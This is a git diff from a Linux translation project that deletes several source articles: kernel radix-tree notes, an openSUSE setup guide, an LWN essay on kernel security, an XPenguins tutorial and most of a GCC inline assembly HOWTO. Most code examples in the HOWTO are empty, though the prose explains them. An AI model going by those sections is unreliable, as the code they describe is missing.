-Low-level kernel memory allocation functions take a set of flags as - `gfp_mask`, which describes how that allocation is to be performed. These `GFP_` flags which control the allocation process can have following values: (`GF_NOIO` flag) means sleep and wait for memory, (`__GFP_HIGHMEM` flag) means high memory can be used, (`GFP_ATOMIC` flag) means the allocation process has high-priority and can't sleep etc.
-
-* `GFP_NOIO` - can sleep and wait for memory;
-* `__GFP_HIGHMEM` - high memory can be used;
-* `GFP_ATOMIC` - allocation process is high-priority and can't sleep;
-
-etc.
-
-The next field is `rnode`:
-
-```C
-struct radix_tree_node {
- unsigned int path;
- unsigned int count;
- union {
- struct {
- struct radix_tree_node *parent;
- void *private_data;
- };
- struct rcu_head rcu_head;
- };
- /* For tree user */
- struct list_head private_list;
- void __rcu *slots[RADIX_TREE_MAP_SIZE];
- unsigned long tags[RADIX_TREE_MAX_TAGS][RADIX_TREE_TAG_LONGS];
-};
-```
-
-This structure contains information about the offset in a parent and height from the bottom, count of the child nodes and fields for accessing and freeing a node. This fields are described below:
-
-* `path` - offset in parent & height from the bottom;
-* `count` - count of the child nodes;
-* `parent` - pointer to the parent node;
-* `private_data` - used by the user of a tree;
-* `rcu_head` - used for freeing a node;
-* `private_list` - used by the user of a tree;
-
-The two last fields of the `radix_tree_node` - `tags` and `slots` are important and interesting. Every node can contains a set of slots which are store pointers to the data. Empty slots in the linux kernel radix tree implementation store `NULL`. Radix trees in the linux kernel also supports tags which are associated with the `tags` fields in the `radix_tree_node` structure. Tags allow individual bits to be set on records which are stored in the radix tree.
-
-Now that we know about radix tree structure, it is time to look on its API.
-
-Linux kernel radix tree API
----------------------------------------------------------------------------------
-
-We start from the datastructure initialization. There are two ways to initialize a new radix tree. The first is to use `RADIX_TREE` macro:
-
-```C
-RADIX_TREE(name, gfp_mask);
-````
-
-As you can see we pass the `name` parameter, so with the `RADIX_TREE` macro we can define and initialize radix tree with the given name. Implementation of the `RADIX_TREE` is easy:
-
-```C
-#define RADIX_TREE(name, mask) \
- struct radix_tree_root name = RADIX_TREE_INIT(mask)
-
-#define RADIX_TREE_INIT(mask) { \
- .height = 0, \
- .gfp_mask = (mask), \
- .rnode = NULL, \
-}
-```
-
-At the beginning of the `RADIX_TREE` macro we define instance of the `radix_tree_root` structure with the given name and call `RADIX_TREE_INIT` macro with the given mask. The `RADIX_TREE_INIT` macro just initializes `radix_tree_root` structure with the default values and the given mask.
-
-The second way is to define `radix_tree_root` structure by hand and pass it with mask to the `INIT_RADIX_TREE` macro:
-
-```C
-struct radix_tree_root my_radix_tree;
-INIT_RADIX_TREE(my_tree, gfp_mask_for_my_radix_tree);
-```
-
-where:
-
-```C
-#define INIT_RADIX_TREE(root, mask) \
-do { \
- (root)->height = 0; \
- (root)->gfp_mask = (mask); \
- (root)->rnode = NULL; \
-} while (0)
-```
-
-makes the same initialziation with default values as it does `RADIX_TREE_INIT` macro.
-
-The next are two functions for inserting and deleting records to/from a radix tree:
-
-* `radix_tree_insert`;
-* `radix_tree_delete`;
-
-The first `radix_tree_insert` function takes three parameters:
-
-* root of a radix tree;
-* index key;
-* data to insert;
-
-The `radix_tree_delete` function takes the same set of parameters as the `radix_tree_insert`, but without data.
-
-The search in a radix tree implemented in two ways:
-
-* `radix_tree_lookup`;
-* `radix_tree_gang_lookup`;
-* `radix_tree_lookup_slot`.
-
-The first `radix_tree_lookup` function takes two parameters:
-
-* root of a radix tree;
-* index key;
-
-This function tries to find the given key in the tree and return the record associated with this key. The second `radix_tree_gang_lookup` function have the following signature
-
-```C
-unsigned int radix_tree_gang_lookup(struct radix_tree_root *root,
- void **results,
- unsigned long first_index,
- unsigned int max_items);
-```
-
-and returns number of records, sorted by the keys, starting from the first index. Number of the returned records will not be greater than `max_items` value.
-
-And the last `radix_tree_lookup_slot` function will return the slot which will contain the data.
-
-Links
----------------------------------------------------------------------------------
-
-* [Radix tree](http://en.wikipedia.org/wiki/Radix_tree)
-* [Trie](http://en.wikipedia.org/wiki/Trie)
-
---------------------------------------------------------------------------------
-
-via: https://github.com/0xAX/linux-insides/edit/master/DataStructures/radix-tree.md
-
-作者:[0xAX]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
-
diff --git a/sources/tech/20151202 8 things to do after installing openSUSE Leap 42.1.md b/sources/tech/20151202 8 things to do after installing openSUSE Leap 42.1.md
deleted file mode 100644
index 183d39252f..0000000000
--- a/sources/tech/20151202 8 things to do after installing openSUSE Leap 42.1.md
+++ /dev/null
@@ -1,109 +0,0 @@
-#name1e5s Translating
-8 things to do after installing openSUSE Leap 42.1
-================================================================================
-![Credit: Metropolitan Transportation/Flicrk](http://images.techhive.com/images/article/2015/11/things-to-do-100626947-primary.idge.jpg)
-Credit: [Metropolitan Transportation/Flicrk][1]
-
-> You've installed openSUSE on your PC. Here's what to do next.
-
-[openSUSE Leap is indeed a huge leap][2], allowing users to run a distro that has the same DNA of SUSE Linux Enterprise. Like any other operating system, some work is needed to get it set up for optimal use.
-
-Following are some of the things that I did after installing openSUSE Leap on my PC (these are not applicable for server installations). None of them are mandatory, and you may be fine with the basic install. But if you need more out of your openSUSE Leap, follow me.
-
-### 1. Adding Packman repository ###
-
-Due to software patents and licences, openSUSE, like many Linux distributions, doesn't offer many applications, codecs, and drivers through official repositories (repos). Instead, these are made available through 3rd party or community repos. The first and most important repository is 'Packman'. Since these repos are not enabled by default, we have to add them. You can do so either using YaST (one of the gems of openSUSE) or by command line (instructions below).
-
-![o42 yast repo](http://images.techhive.com/images/article/2015/11/o42-yast-repo-100626952-large970.idge.png)
-Adding Packman repositories.
-
-Using YaST, go to the Software Repositories section. Click on the 'Add’ button and select 'Community Repositories.' Click 'next.' And once the repos are loaded, select the Packman Repository. Click 'OK,' then import the trusted GnuPG key by clicking on the 'Trust' button.
-
-Or, using the terminal you can add and enable the Packman repo using the following command:
-
- zypper ar -f -n packmanhttp://ftp.gwdg.de/pub/linux/misc/packman/suse/openSUSE_Leap_42.1/ packman
-
-Once the repo is added, you have access to many more packages. To install any application or package, open YaST Software Manager, search for the package and install it.
-
-### 2. Install VLC ###
-
-VLC is the Swiss Army knife of media players and can play virtually any media file. You can install VLC from YaST Software Manager or from software.opensuse.org. You will need to install two packages: vlc and vlc-codecs.
-
-If using terminal, run the following command:
-
- sudo zypper install vlc vlc-codecs
-
-### 3. Install Handbrake ###
-
-If you need to transcode or convert your video files from one format to another, [Handbrake is the tools for you][3]. Handbrake is available through repositories we enabled, so just search for it in YaST and install.
-
-If you are using the terminal, run the following command:
-
- sudo zypper install handbrake-cli handbrake-gtk
-
-(Pro tip: VLC can also transcode audio and video files.)
-
-### 4. Install Chrome ###
-
-OpenSUSE comes with Firefox as the default browser. But since Firefox isn't capable of playing restricted media such as Netflix, I recommend installing Chrome. This takes some extra work. First you need to import the trusted key from Google. Open the terminal app and run the 'wget' command to download the key:
-
- wget https://dl.google.com/linux/linux_signing_key.pub
-
-Then import the key:
-
- sudo rpm --import linux_signing_key.pub
-
-Now head over to the [Google Chrome website][4] and download the 64 bit .rpm file. Once downloaded run the following command to install the browser:
-
- sudo zypper install /PATH_OF_GOOGLE_CHROME.rpm
-
-### 5. Install Nvidia drivers ###
-
-OpenSUSE Leap will work out of the box even if you have Nvidia or ATI graphics cards. However, if you do need the proprietary drivers for gaming or any other purpose, you can install such drivers, but some extra work is needed.
-
-First you need to add the Nvidia repositories; it's the same procedure we used to add Packman repositories using YaST. The only difference is that you will choose Nvidia from the Community Repositories section. Once it's added, go to **Software Management > Extras** and select 'Extras/Install All Matching Recommended Packages'.
-
-![o42 nvidia](http://images.techhive.com/images/article/2015/11/o42-nvidia-100626950-large.idge.png)
-
-It will open a dialogue box showing all the packages it's going to install, click OK and follow the instructions. You can also run the following command after adding the Nvidia repository to install the needed Nvidia drivers:
-
- sudo zypper inr
-
-(Note: I have never used AMD/ATI cards so I have no experience with them.)
-
-### 6. Install media codecs ###
-
-Once you have VLC installed you won't need to install media codecs, but if you are using other apps for media playback you will need to install such codecs. Some developers have written scripts/tools which makes it a much easier process. Just go to [this page][5] and install the entire pack by clicking on the appropriate button. It will open YaST and install the packages automatically (of source you will have to give the root password and trust the GnuPG key, as usual).
-
-### 7. Install your preferred email client ###
-
-OpenSUSE comes with Kmail or Evolution, depending on the Desktop Environment you installed on the system. I run Plasma, which comes with Kmail, and this email client leaves a lot to be desired. I suggest trying Thunderbird or Evolution mail. All major email clients are available through official repositories. You can also check my [handpicked list of the best email clients for Linux][7].
-
-### 8. Enable Samba services from Firewall ###
-
-OpenSUSE offers a much more secure system out of the box, compared to other distributions. But it also requires a little bit more work for a new user. If you are using Samba protocol to share files within your local network then you will have to allow that service from the Firewall.
-
-![o42 firewall](http://images.techhive.com/images/article/2015/11/o42-firewall-100626948-large970.idge.png)
-Allow Samba Client and Server from Firewall settings.
-
-Open YaST and search for Firewall. Once in Firewall settings, go to 'Allowed Services' where you will see a drop down list under 'Service to allow.' Select 'Samba Client,' then click 'Add.' Do the same with the 'Samba Server' option. Once both are added, click 'Next,' then click 'Finish,' and now you will be able to share folders from your openSUSE system and also access other machines over the local network.
-
-That's pretty much all that I did on my new openSUSE system to set it up just the way I like it. If you have any questions, please feel free to ask in the comments below.
-
---------------------------------------------------------------------------------
-
-via: http://www.itworld.com/article/3003865/open-source-tools/8-things-to-do-after-installing-opensuse-leap-421.html
-
-作者:[Swapnil Bhartiya][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.itworld.com/author/Swapnil-Bhartiya/
-[1]:https://www.flickr.com/photos/mtaphotos/11200079265/
-[2]:https://www.linux.com/news/software/applications/865760-opensuse-leap-421-review-the-most-mature-linux-distribution
-[3]:https://www.linux.com/learn/tutorials/857788-how-to-convert-videos-in-linux-using-the-command-line
-[4]:https://www.google.com/intl/en/chrome/browser/desktop/index.html#brand=CHMB&utm_campaign=en&utm_source=en-ha-na-us-sk&utm_medium=ha
-[5]:http://opensuse-community.org/
-[6]:http://www.itworld.com/article/2875981/the-5-best-open-source-email-clients-for-linux.html
diff --git a/sources/tech/20151202 A new Mindcraft moment.md b/sources/tech/20151202 A new Mindcraft moment.md
deleted file mode 100644
index 92c645ea4b..0000000000
--- a/sources/tech/20151202 A new Mindcraft moment.md
+++ /dev/null
@@ -1,44 +0,0 @@
-zpl1025
-A new Mindcraft moment?
-=======================
-
-Credit:Jonathan Corbet
-
-It is not often that Linux kernel development attracts the attention of a mainstream newspaper like The Washington Post; lengthy features on the kernel community's approach to security are even more uncommon. So when just such a feature hit the net, it attracted a lot of attention. This article has gotten mixed reactions, with many seeing it as a direct attack on Linux. The motivations behind the article are hard to know, but history suggests that we may look back on it as having given us a much-needed push in a direction we should have been going for some time.
-
-Think back, a moment, to the dim and distant past — April 1999, to be specific. An analyst company named Mindcraft issued a report showing that Windows NT greatly outperformed Red Hat Linux 5.2 and Apache for web-server workloads. The outcry from the Linux community, including from a very young LWN, was swift and strong. The report was a piece of Microsoft-funded FUD trying to cut off an emerging threat to its world-domination plans. The Linux system had been deliberately configured for poor performance. The hardware chosen was not well supported by Linux at the time. And so on.
-
-Once people calmed down a bit, though, one other fact came clear: the Mindcraft folks, whatever their motivations, had a point. Linux did, indeed, have performance problems that were reasonably well understood even at the time. The community then did what it does best: we sat down and fixed the problems. The scheduler got exclusive wakeups, for example, to put an end to thethundering-herd problem in the acceptance of connection requests. Numerous other little problems were fixed. Within a year or so, the kernel's performance on this kind of workload had improved considerably.
-
-The Mindcraft report, in other words, was a much-needed kick in the rear that got the community to deal with issues that had been neglected until then.
-
-The Washington Post article seems clearly slanted toward a negative view of the Linux kernel and its contributors. It freely mixes kernel problems with other issues (the AshleyMadison.com breakin, for example) that were not kernel vulnerabilities at all. The fact that vendors seem to have little interest in getting security fixes to their customers is danced around like a huge elephant in the room. There are rumors of dark forces that drove the article in the hopes of taking Linux down a notch. All of this could well be true, but it should not be allowed to overshadow the simple fact that the article has a valid point.
-
-We do a reasonable job of finding and fixing bugs. Problems, whether they are security-related or not, are patched quickly, and the stable-update mechanism makes those patches available to kernel users. Compared to a lot of programs out there (free and proprietary alike), the kernel is quite well supported. But pointing at our ability to fix bugs is missing a crucial point: fixing security bugs is, in the end, a game of whack-a-mole. There will always be more moles, some of which we will not know about (and will thus be unable to whack) for a long time after they are discovered and exploited by attackers. These bugs leave our users vulnerable, even if the commercial side of Linux did a perfect job of getting fixes to users — which it decidedly does not.
-
-The point that developers concerned about security have been trying to make for a while is that fixing bugs is not enough. We must instead realize that we will never fix them all and focus on making bugs harder to exploit. That means restricting access to information about the kernel, making it impossible for the kernel to execute code in user-space memory, instrumenting the kernel to detect integer overflows, and all the other things laid out in Kees Cook's Kernel Summit talk at the end of October. Many of these techniques are well understood and have been adopted by other operating systems; others will require innovation on our part. But, if we want to adequately defend our users from attackers, these changes need to be made.
-
-Why hasn't the kernel adopted these technologies already? The Washington Post article puts the blame firmly on the development community, and on Linus Torvalds in particular. The culture of the kernel community prioritizes performance and functionality over security and is unwilling to make compromises if they are needed to improve the security of the kernel. There is some truth to this claim; the good news is that attitudes appear to be shifting as the scope of the problem becomes clear. Kees's talk was well received, and it clearly got developers thinking and talking about the issues.
-
-The point that has been missed is that we do not just have a case of Linus fending off useful security patches. There simply are not many such patches circulating in the kernel community. In particular, the few developers who are working in this area have never made a serious attempt to get that work integrated upstream. Getting any large, intrusive patch set merged requires working with the kernel community, making the case for the changes, splitting the changes into reviewable pieces, dealing with review comments, and so on. It can be tiresome and frustrating, but it's how the kernel works, and it clearly results in a more generally useful, more maintainable kernel in the long run.
-
-Almost nobody is doing that work to get new security technologies into the kernel. One might cite a "chilling effect" from the hostile reaction such patches can receive, but that is an inadequate answer: developers have managed to merge many changes over the years despite a difficult initial reaction. Few security developers are even trying.
-
-Why aren't they trying? One fairly obvious answer is that almost nobody is being paid to try. Almost all of the work going into the kernel is done by paid developers and has been for many years. The areas that companies see fit to support get a lot of work and are well advanced in the kernel. The areas that companies think are not their problem are rather less so. The difficulties in getting support for realtime development are a clear case in point. Other areas, such as documentation, tend to languish as well. Security is clearly one of those areas. There are a lot of reasons why Linux lags behind in defensive security technologies, but one of the key ones is that the companies making money on Linux have not prioritized the development and integration of those technologies.
-
-There are signs that things might be changing a bit. More developers are showing interest in security-related issues, though commercial support for their work is still less than it should be. The reaction against security-related changes might be less knee-jerk negative than it used to be. Efforts like the Kernel Self Protection Project are starting to work on integrating existing security technologies into the kernel.
-
-We have a long way to go, but, with some support and the right mindset, a lot of progress can be made in a short time. The kernel community can do amazing things when it sets its mind to it. With luck, the Washington Post article will help to provide the needed impetus for that sort of setting of mind. History suggests that we will eventually see this moment as a turning point, when we were finally embarrassed into doing work that has clearly needed doing for a while. Linux should not have a substandard security story for much longer.
-
----------------------------
-
-via: https://lwn.net/Articles/663474/
-
-作者:Jonathan Corbet
-
-译者:[译者ID](https://github.com/译者ID)
-
-校对:[校对者ID](https://github.com/校对者ID)
-
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
diff --git a/sources/tech/20151215 Linux Desktop Fun--Summon Swarms Of Penguins To Waddle About The Desktop.md b/sources/tech/20151215 Linux Desktop Fun--Summon Swarms Of Penguins To Waddle About The Desktop.md
deleted file mode 100644
index b544517f5e..0000000000
--- a/sources/tech/20151215 Linux Desktop Fun--Summon Swarms Of Penguins To Waddle About The Desktop.md
+++ /dev/null
@@ -1,101 +0,0 @@
-translation by strugglingyouth
-Linux Desktop Fun: Summon Swarms Of Penguins To Waddle About The Desktop
-================================================================================
-XPenguins is a program for animating cute cartoons animals in your root window. By default it will be penguins they drop in from the top of the screen, walk along the tops of your windows, up the side of your windows, levitate, skateboard, and do other similarly exciting things. Now you can send an army of cute little penguins to invade the screen of someone else on your network.
-
-### Install XPenguins ###
-
-Open a command-line terminal (select Applications > Accessories > Terminal), and then type the following commands to install XPenguins program. First, type the command apt-get update to tell apt to refresh its package information by querying the configured repositories and then install the required program:
-
- $ sudo apt-get update
- $ sudo apt-get install xpenguins
-
-### How do I Start XPenguins Locally? ###
-
-Type the following command:
-
- $ xpenguins
-
-Sample outputs:
-
-![An army of cute little penguins invading the screen](http://files.cyberciti.biz/uploads/tips/2011/07/Workspace-1_002_12_07_2011.png)
-
-An army of cute little penguins invading the screen
-
-![Linux: Cute little penguins walking along the tops of your windows](http://files.cyberciti.biz/uploads/tips/2011/07/Workspace-1_001_12_07_2011.png)
-
-Linux: Cute little penguins walking along the tops of your windows
-
-![Xpenguins Screenshot](http://files.cyberciti.biz/uploads/tips/2011/07/xpenguins-screenshot.jpg)
-
-Xpenguins Screenshot
-
-Be careful when you move windows as the little guys squash easily. If you send the program an interupt signal (Ctrl-C) they will burst.
-
-### Themes ###
-
-To list themes, enter:
-
- $ xpenguins -l
-
-Sample outputs:
-
- Big Penguins
- Bill
- Classic Penguins
- Penguins
- Turtles
-
-You can use alternative themes as follows:
-
- $ xpenguins --theme "Big Penguins" --theme "Turtles"
-
-You can install additional themes as follows:
-
- $ cd /tmp
- $ wget http://xpenguins.seul.org/xpenguins_themes-1.0.tar.gz
- $ tar -zxvf xpenguins_themes-1.0.tar.gz
- $ mkdir ~/.xpenguins
- $ mv -v themes ~/.xpenguins/
- $ xpenguins -l
-
-Sample outputs:
-
- Lemmings
- Sonic the Hedgehog
- The Simpsons
- Winnie the Pooh
- Worms
- Big Penguins
- Bill
- Classic Penguins
- Penguins
- Turtles
-
-To start with a random theme, enter:
-
- $ xpenguins --random-theme
-
-To load all available themes and run them simultaneously, enter:
-
- $ xpenguins --all
-
-More links and information:
-
-- [XPenguins][1] home page.
-- man penguins
-- More Linux / UNIX desktop fun with [Steam Locomotive][2] and [Terminal ASCII Aquarium][3].
-
---------------------------------------------------------------------------------
-
-via: http://www.cyberciti.biz/tips/linux-cute-little-xpenguins-walk-along-tops-ofyour-windows.html
-
-作者:Vivek Gite
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[1]:http://xpenguins.seul.org/
-[2]:http://www.cyberciti.biz/tips/displays-animations-when-accidentally-you-type-sl-instead-of-ls.html
-[3]:http://www.cyberciti.biz/tips/linux-unix-apple-osx-terminal-ascii-aquarium.html
diff --git a/sources/tech/20151215 Securi-Pi--Using the Raspberry Pi as a Secure Landing Point.md b/sources/tech/20151215 Securi-Pi--Using the Raspberry Pi as a Secure Landing Point.md
index 7388b7693e..36c28d25d6 100644
--- a/sources/tech/20151215 Securi-Pi--Using the Raspberry Pi as a Secure Landing Point.md
+++ b/sources/tech/20151215 Securi-Pi--Using the Raspberry Pi as a Secure Landing Point.md
@@ -1,7 +1,3 @@
-translating by ezio
-
-
-
Securi-Pi: Using the Raspberry Pi as a Secure Landing Point
================================================================================
diff --git a/sources/tech/20151220 GCC-Inline-Assembly-HOWTO.md b/sources/tech/20151220 GCC-Inline-Assembly-HOWTO.md
deleted file mode 100644
index 80031c7fd8..0000000000
--- a/sources/tech/20151220 GCC-Inline-Assembly-HOWTO.md
+++ /dev/null
@@ -1,631 +0,0 @@
-[Translating by cposture 16-01-14]
-* * *
-
-# GCC-Inline-Assembly-HOWTO
-v0.1, 01 March 2003.
-* * *
-
-_This HOWTO explains the use and usage of the inline assembly feature provided by GCC. There are only two prerequisites for reading this article, and that’s obviously a basic knowledge of x86 assembly language and C._
-
-* * *
-
-## 1. Introduction.
-
-## 1.1 Copyright and License.
-
-Copyright (C)2003 Sandeep S.
-
-This document is free; you can redistribute and/or modify this under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
-
-This document is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
-
-## 1.2 Feedback and Corrections.
-
-Kindly forward feedback and criticism to [Sandeep.S](mailto:busybox@sancharnet.in). I will be indebted to anybody who points out errors and inaccuracies in this document; I shall rectify them as soon as I am informed.
-
-## 1.3 Acknowledgments.
-
-I express my sincere appreciation to GNU people for providing such a great feature. Thanks to Mr.Pramode C E for all the helps he did. Thanks to friends at the Govt Engineering College, Trichur for their moral-support and cooperation, especially to Nisha Kurur and Sakeeb S. Thanks to my dear teachers at Govt Engineering College, Trichur for their cooperation.
-
-Additionally, thanks to Phillip, Brennan Underwood and colin@nyx.net; Many things here are shamelessly stolen from their works.
-
-* * *
-
-## 2. Overview of the whole thing.
-
-We are here to learn about GCC inline assembly. What this inline stands for?
-
-We can instruct the compiler to insert the code of a function into the code of its callers, to the point where actually the call is to be made. Such functions are inline functions. Sounds similar to a Macro? Indeed there are similarities.
-
-What is the benefit of inline functions?
-
-This method of inlining reduces the function-call overhead. And if any of the actual argument values are constant, their known values may permit simplifications at compile time so that not all of the inline function’s code needs to be included. The effect on code size is less predictable, it depends on the particular case. To declare an inline function, we’ve to use the keyword `inline` in its declaration.
-
-Now we are in a position to guess what is inline assembly. Its just some assembly routines written as inline functions. They are handy, speedy and very much useful in system programming. Our main focus is to study the basic format and usage of (GCC) inline assembly functions. To declare inline assembly functions, we use the keyword `asm`.
-
-Inline assembly is important primarily because of its ability to operate and make its output visible on C variables. Because of this capability, "asm" works as an interface between the assembly instructions and the "C" program that contains it.
-
-* * *
-
-## 3. GCC Assembler Syntax.
-
-GCC, the GNU C Compiler for Linux, uses **AT&T**/**UNIX** assembly syntax. Here we’ll be using AT&T syntax for assembly coding. Don’t worry if you are not familiar with AT&T syntax, I will teach you. This is quite different from Intel syntax. I shall give the major differences.
-
-1. Source-Destination Ordering.
-
- The direction of the operands in AT&T syntax is opposite to that of Intel. In Intel syntax the first operand is the destination, and the second operand is the source whereas in AT&T syntax the first operand is the source and the second operand is the destination. ie,
-
- "Op-code dst src" in Intel syntax changes to
-
- "Op-code src dst" in AT&T syntax.
-
-2. Register Naming.
-
- Register names are prefixed by % ie, if eax is to be used, write %eax.
-
-3. Immediate Operand.
-
- AT&T immediate operands are preceded by ’$’. For static "C" variables also prefix a ’$’. In Intel syntax, for hexadecimal constants an ’h’ is suffixed, instead of that, here we prefix ’0x’ to the constant. So, for hexadecimals, we first see a ’$’, then ’0x’ and finally the constants.
-
-4. Operand Size.
-
- In AT&T syntax the size of memory operands is determined from the last character of the op-code name. Op-code suffixes of ’b’, ’w’, and ’l’ specify byte(8-bit), word(16-bit), and long(32-bit) memory references. Intel syntax accomplishes this by prefixing memory operands (not the op-codes) with ’byte ptr’, ’word ptr’, and ’dword ptr’.
-
- Thus, Intel "mov al, byte ptr foo" is "movb foo, %al" in AT&T syntax.
-
-5. Memory Operands.
-
- In Intel syntax the base register is enclosed in ’[’ and ’]’ where as in AT&T they change to ’(’ and ’)’. Additionally, in Intel syntax an indirect memory reference is like
-
- section:[base + index*scale + disp], which changes to
-
- section:disp(base, index, scale) in AT&T.
-
- One point to bear in mind is that, when a constant is used for disp/scale, ’$’ shouldn’t be prefixed.
-
-Now we saw some of the major differences between Intel syntax and AT&T syntax. I’ve wrote only a few of them. For a complete information, refer to GNU Assembler documentations. Now we’ll look at some examples for better understanding.
-
-> `
->
->
->
-> `
-
-* * *
-
-## 4. Basic Inline.
-
-The format of basic inline assembly is very much straight forward. Its basic form is
-
-`asm("assembly code");`
-
-Example.
-
-> `
->
-> * * *
->
->
asm("movl %ecx %eax"); /* moves the contents of ecx to eax */
-> __asm__("movb %bh (%eax)"); /*moves the byte from bh to the memory pointed by eax */
->
->
-> * * *
->
-> `
-
-You might have noticed that here I’ve used `asm` and `__asm__`. Both are valid. We can use `__asm__` if the keyword `asm` conflicts with something in our program. If we have more than one instructions, we write one per line in double quotes, and also suffix a ’\n’ and ’\t’ to the instruction. This is because gcc sends each instruction as a string to **as**(GAS) and by using the newline/tab we send correctly formatted lines to the assembler.
-
-Example.
-
-> `
->
-> * * *
->
->
->
-> * * *
->
-> `
-
-If in our code we touch (ie, change the contents) some registers and return from asm without fixing those changes, something bad is going to happen. This is because GCC have no idea about the changes in the register contents and this leads us to trouble, especially when compiler makes some optimizations. It will suppose that some register contains the value of some variable that we might have changed without informing GCC, and it continues like nothing happened. What we can do is either use those instructions having no side effects or fix things when we quit or wait for something to crash. This is where we want some extended functionality. Extended asm provides us with that functionality.
-
-* * *
-
-## 5. Extended Asm.
-
-In basic inline assembly, we had only instructions. In extended assembly, we can also specify the operands. It allows us to specify the input registers, output registers and a list of clobbered registers. It is not mandatory to specify the registers to use, we can leave that head ache to GCC and that probably fit into GCC’s optimization scheme better. Anyway the basic format is:
-
-> `
->
-> * * *
->
->
->
-> * * *
->
-> `
-
-The assembler template consists of assembly instructions. Each operand is described by an operand-constraint string followed by the C expression in parentheses. A colon separates the assembler template from the first output operand and another separates the last output operand from the first input, if any. Commas separate the operands within each group. The total number of operands is limited to ten or to the maximum number of operands in any instruction pattern in the machine description, whichever is greater.
-
-If there are no output operands but there are input operands, you must place two consecutive colons surrounding the place where the output operands would go.
-
-Example:
-
-> `
->
-> * * *
->
->
->
-> * * *
->
-> `
-
-Now, what does this code do? The above inline fills the `fill_value` `count` times to the location pointed to by the register `edi`. It also says to gcc that, the contents of registers `eax` and `edi` are no longer valid. Let us see one more example to make things more clearer.
-
-> `
->
-> * * *
->
->
->
-> * * *
->
-> `
-
-Here what we did is we made the value of ’b’ equal to that of ’a’ using assembly instructions. Some points of interest are:
-
-* "b" is the output operand, referred to by %0 and "a" is the input operand, referred to by %1.
-* "r" is a constraint on the operands. We’ll see constraints in detail later. For the time being, "r" says to GCC to use any register for storing the operands. output operand constraint should have a constraint modifier "=". And this modifier says that it is the output operand and is write-only.
-* There are two %’s prefixed to the register name. This helps GCC to distinguish between the operands and registers. operands have a single % as prefix.
-* The clobbered register %eax after the third colon tells GCC that the value of %eax is to be modified inside "asm", so GCC won’t use this register to store any other value.
-
-When the execution of "asm" is complete, "b" will reflect the updated value, as it is specified as an output operand. In other words, the change made to "b" inside "asm" is supposed to be reflected outside the "asm".
-
-Now we may look each field in detail.
-
-## 5.1 Assembler Template.
-
-The assembler template contains the set of assembly instructions that gets inserted inside the C program. The format is like: either each instruction should be enclosed within double quotes, or the entire group of instructions should be within double quotes. Each instruction should also end with a delimiter. The valid delimiters are newline(\n) and semicolon(;). ’\n’ may be followed by a tab(\t). We know the reason of newline/tab, right?. Operands corresponding to the C expressions are represented by %0, %1 ... etc.
-
-## 5.2 Operands.
-
-C expressions serve as operands for the assembly instructions inside "asm". Each operand is written as first an operand constraint in double quotes. For output operands, there’ll be a constraint modifier also within the quotes and then follows the C expression which stands for the operand. ie,
-
-"constraint" (C expression) is the general form. For output operands an additional modifier will be there. Constraints are primarily used to decide the addressing modes for operands. They are also used in specifying the registers to be used.
-
-If we use more than one operand, they are separated by comma.
-
-In the assembler template, each operand is referenced by numbers. Numbering is done as follows. If there are a total of n operands (both input and output inclusive), then the first output operand is numbered 0, continuing in increasing order, and the last input operand is numbered n-1\. The maximum number of operands is as we saw in the previous section.
-
-Output operand expressions must be lvalues. The input operands are not restricted like this. They may be expressions. The extended asm feature is most often used for machine instructions the compiler itself does not know as existing ;-). If the output expression cannot be directly addressed (for example, it is a bit-field), our constraint must allow a register. In that case, GCC will use the register as the output of the asm, and then store that register contents into the output.
-
-As stated above, ordinary output operands must be write-only; GCC will assume that the values in these operands before the instruction are dead and need not be generated. Extended asm also supports input-output or read-write operands.
-
-So now we concentrate on some examples. We want to multiply a number by 5\. For that we use the instruction `lea`.
-
-> `
->
-> * * *
->
->
->
-> * * *
->
-> `
-
-Here our input is in ’x’. We didn’t specify the register to be used. GCC will choose some register for input, one for output and does what we desired. If we want the input and output to reside in the same register, we can instruct GCC to do so. Here we use those types of read-write operands. By specifying proper constraints, here we do it.
-
-> `
->
-> * * *
->
->
->
-> * * *
->
-> `
-
-Now the input and output operands are in the same register. But we don’t know which register. Now if we want to specify that also, there is a way.
-
-> `
->
-> * * *
->
->
->
-> * * *
->
-> `
-
-In all the three examples above, we didn’t put any register to the clobber list. why? In the first two examples, GCC decides the registers and it knows what changes happen. In the last one, we don’t have to put `ecx` on the c lobberlist, gcc knows it goes into x. Therefore, since it can know the value of `ecx`, it isn’t considered clobbered.
-
-## 5.3 Clobber List.
-
-Some instructions clobber some hardware registers. We have to list those registers in the clobber-list, ie the field after the third ’**:**’ in the asm function. This is to inform gcc that we will use and modify them ourselves. So gcc will not assume that the values it loads into these registers will be valid. We shoudn’t list the input and output registers in this list. Because, gcc knows that "asm" uses them (because they are specified explicitly as constraints). If the instructions use any other registers, implicitly or explicitly (and the registers are not present either in input or in the output constraint list), then those registers have to be specified in the clobbered list.
-
-If our instruction can alter the condition code register, we have to add "cc" to the list of clobbered registers.
-
-If our instruction modifies memory in an unpredictable fashion, add "memory" to the list of clobbered registers. This will cause GCC to not keep memory values cached in registers across the assembler instruction. We also have to add the **volatile** keyword if the memory affected is not listed in the inputs or outputs of the asm.
-
-We can read and write the clobbered registers as many times as we like. Consider the example of multiple instructions in a template; it assumes the subroutine _foo accepts arguments in registers `eax` and `ecx`.
-
-> `
->
-> * * *
->
->
->
-> * * *
->
-> `
-
-## 5.4 Volatile ...?
-
-If you are familiar with kernel sources or some beautiful code like that, you must have seen many functions declared as `volatile` or `__volatile__` which follows an `asm` or `__asm__`. I mentioned earlier about the keywords `asm` and `__asm__`. So what is this `volatile`?
-
